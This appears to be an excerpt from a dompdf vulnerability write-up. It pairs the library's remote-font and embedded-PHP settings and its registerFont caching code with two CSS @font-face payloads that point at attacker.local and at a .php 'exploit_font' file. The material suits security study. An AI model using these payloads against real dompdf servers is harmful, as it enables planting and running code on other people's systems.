/**
* Enable embedded PHP
*
* If this setting is set to true then DOMPDF will automatically evaluate
* embedded PHP contained within  ...  tags.
*
* ==== IMPORTANT ====
* Enabling this for documents you do not trust (e.g. arbitrary remote html
* pages) is a security risk. Embedded scripts are run with the same level of
* system access available to dompdf. Set this option to false (recommended)
* if you wish to process untrusted documents.
*
* This setting may increase the risk of system exploit. Do not change
* this settings without understanding the consequences. Additional
* documentation is available on the dompdf wiki at:
*
*
* @var bool
*/
private $isPhpEnabled = false;

/**
* Enable remote file access
*
* If this setting is set to true, DOMPDF will access remote sites for
* images and CSS files as required.
*
* ==== IMPORTANT ====
* This can be a security risk, in particular in combination with isPhpEnabled and
* allowing remote html code to be passed to $dompdf = new DOMPDF(); $dompdf->load_html(...);
* This allows anonymous users to download legally doubtful internet content which on
* tracing back appears to being downloaded by your server, or allows malicious php code
* in remote html pages to be executed by your server with your account privileges.
*
* This setting may increase the risk of system exploit. Do not change
* this settings without understanding the consequences. Additional
* documentation is available on the dompdf wiki at:
*
*
* @var bool
*/
private $isRemoteEnabled = false;

@font-face {
   font-family:'TestFont';
   src:url('http://attacker.local/test_font.ttf');
   font-weight:'normal';
   font-style:'normal';
 }

/**  
* @param array $style  
* @param string $remoteFile  
* @param resource $context  
* @return bool  
*/  
public function registerFont($style, $remoteFile, $context = null)  
{  
 $fontname = mb_strtolower($style["family"]);  
 $styleString = $this->getType("{$style['weight']} {$style['style']}");  
  
 $fontDir = $this->options->getFontDir();  
 $remoteHash = md5($remoteFile);  
  
 $prefix = $fontname . "_" . $styleString;  
 $prefix = preg_replace("[\\W]", "_", $prefix);  
 $prefix = preg_replace("/[^-_\\w]+/", "", $prefix);  
  
 $localFile = $fontDir . "/" . $prefix . "_" . $remoteHash;  
 $localFile .= ".".strtolower(pathinfo(parse_url($remoteFile, PHP_URL_PATH), PATHINFO_EXTENSION));  
  
 // Download the remote file  
 list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context);  
  
 $localTempFile = @tempnam($this->options->get("tempDir"), "dompdf-font-");  
 file_put_contents($localTempFile, $remoteFileContent);  
  
 $font = Font::load($localTempFile);  
  
 if (!$font) {  
 unlink($localTempFile);  
 return false;  
 }  
  
 $font->parse();  
 $font->close();  
  
 unlink($localTempFile);  
  
 // Save the changes  
 file_put_contents($localFile, $remoteFileContent);  
 $this->saveFontFamilies();  
  
 return true;  
}

@font-face {  
 font-family:'exploitfont';  
 src:url('http://localhost:9001/exploit_font.php');  
 font-weight:'normal';  
 font-style:'normal';  
 }